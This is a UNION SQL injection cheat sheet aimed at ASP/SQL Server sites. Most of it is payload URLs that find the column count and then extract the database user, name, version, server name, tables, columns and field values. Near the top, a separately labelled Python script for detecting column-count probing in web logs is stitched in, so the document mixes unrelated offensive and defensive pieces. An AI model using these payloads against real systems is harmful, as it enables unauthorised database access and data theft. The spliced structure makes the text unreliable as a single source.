Syler.Grey[at]gmail.com

UNION SQL INJECTION - DETECTION
 
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR
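
The column-count probing above (1, then 1,2, then 1,2,3 ...) leaves a recognisable sequence in web server logs. The following is an added detection example, not part of the original page: it flags a client that sends several different UNION SELECT column counts to the same parameter. The log format, IP addresses and the names column_count and find_column_probing are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines ("client-ip method uri"); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 GET /page.asp?id=1
203.0.113.7 GET /page.asp?id=1%20UNION%20SELECT%20ALL%201--
203.0.113.7 GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2--
203.0.113.7 GET /page.asp?id=1+union+select+all+1,2,3--
203.0.113.7 GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3,4--
198.51.100.9 GET /page.asp?id=42
198.51.100.9 GET /news.asp?title=student+union+select+committee
"""

# Captures the select list that follows UNION [ALL] SELECT [ALL|DISTINCT].
UNION_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\s+(?:all\s+|distinct\s+)?(.*?)(?:--|\bfrom\b|$)",
    re.I | re.S,
)

def column_count(select_list):
    """Count top-level expressions, ignoring commas inside parentheses."""
    depth, count = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(0, depth - 1)
        elif ch == "," and depth == 0:
            count += 1
    return count

def find_column_probing(log_text, min_distinct=3):
    """Map (ip, path, parameter) -> sorted column counts tried, for clients
    that sent at least `min_distinct` different counts to one parameter."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ip, _method, uri = parts
        url = urlsplit(uri)
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            match = UNION_RE.search(unquote_plus(raw))
            if match:
                seen[(ip, url.path, name)].add(column_count(match.group(1)))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_distinct}
```

Requiring several distinct column counts from one client keeps a single benign hit, such as the constructed "student union select committee" search, from raising an alert.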

 

UNION SQL INJECTION - EXTRACT DATABASE USER
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--

[DB USER]

 

UNION SQL INJECTION - EXTRACT DATABASE NAME
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME(),3,4--

[DB NAME]

 

UNION SQL INJECTION - EXTRACT DATABASE VERSION
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--

[DB VERSION]

 

UNION SQL INJECTION - EXTRACT SERVER NAME
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--

[SERVER NAME]

 

UNION SQL INJECTION - EXTRACT DATABASE TABLES
 
http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--

[TABLE NAME 1]

 

UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
 
http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--

[COLUMN NAME  1]

 

UNION SQL INJECTION - EXTRACT 1st FIELD
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--

[FIELD 1 VALUE]

 

UNION SQL INJECTION - EXTRACT 2nd FIELD
 
http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--

[FIELD 2 VALUE]

 

UNION SQL INJECTION - EXTRACT 3rd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--

[FIELD 3 VALUE]

 

